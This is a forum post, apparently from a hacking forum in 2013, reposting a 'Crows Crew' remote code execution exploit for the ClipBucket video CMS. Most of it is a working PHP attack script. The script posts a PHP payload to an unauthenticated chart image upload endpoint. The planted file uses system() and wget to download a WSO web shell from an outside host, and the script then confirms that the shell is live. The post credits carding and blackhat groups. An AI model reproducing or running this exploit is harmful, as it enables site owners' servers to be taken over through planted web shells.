cPanel Posted October 15, 2013 Report Posted October 15, 2013 (edited) #### __________.__ _________ _________# \__ ___/| |__ ____ \_ ___ \_______ ______ _ ________ \_ ___ \_______ ______ _ __# | | | | \_/ __ \ / \ \/\_ __ \/ _ \ \/ \/ / ___/ / \ \/\_ __ \_/ __ \ \/ \/ /# | | | Y \ ___/ \ \____| | \( <_> ) /\___ \ \ \____| | \/\ ___/\ /# |____| |___| /\___ > \______ /|__| \____/ \/\_//____ > \______ /|__| \___ >\/\_/# \/ \/ \/ \/ \/ \/###[url=]-=[ The Crows Crew Official Website ]=-[/url]#### Exploit title : ClipBucket Remote Code Execution Vulnerability# Author : Gabby# Dork = use ur brain # Vendor Site : [url=]ClipBucket – Free Video Sharing Website Script, Youtube, Daily-motion Clone, PHP Video Script, Media Sharing CMS, Best PHP Solution for Social Networking.[/url]# Software Download : [url=]ClipBucket | Free software downloads at[/url]###<?php$options = getopt('t:n:');if(!isset($options['t'], $options['n']))die("\n [+] Simple Exploiter ClipBucket by Gabby [+] \n Usage : php clip.php -t [url=]Target : Expect More. Pay Less.[/url] -n bie.php\n-t [url=]Target : Expect More. Pay Less.[/url] = Target mu ..-n bie.php = Nama file yang mau kamu pakai...\n\n");$target = $options['t'];$nama = $options['n'];$shell = "{$target}/admin_area/charts/tmp-upload-images/{$nama}";$target = "{$target}/admin_area/charts/ofc-library/ofc_upload_image.php?name={$nama}";$data = '<?phpsystem("wget [url=;]CirtexHosting - Site Suspended[/url] mv wso.txt bie.php");fclose ( $handle );?>';$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','Content-Type: text/plain');echo "============================================ \n";echo ": Simple Exploiter ClipBucket by Gabby :\n";echo "============================================ \n\n";echo "[+] Upload Shell ke : {$options['t']}\n";$handle = curl_init();curl_setopt($handle, CURLOPT_URL, $target);curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);curl_setopt($handle, CURLOPT_POSTFIELDS, $data);curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);$source = curl_exec($handle);curl_close($handle);if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')){echo "[+] Exploit Sukses,.. \n";echo "[+] {$shell}\n";}else{die("[-] Exploit Gagal,.. \n");}?>see on ss :1. [url][/url]2. [url][/url]####Thanks to :Catalyst71, kit4r0, 777r, ovanIsmycode, walangkaji, y0g4, my "Dad", my sista Wii, cW3 G4pt3K,Red-x, Vanda, Deb, Sultan, Meninbox, n all my luvly friend,..Greets to :Yogyacarderlink, SurabayaBlackhat,..^^#### Edited October 15, 2013 by TheTime lipsa taguri PHP Quote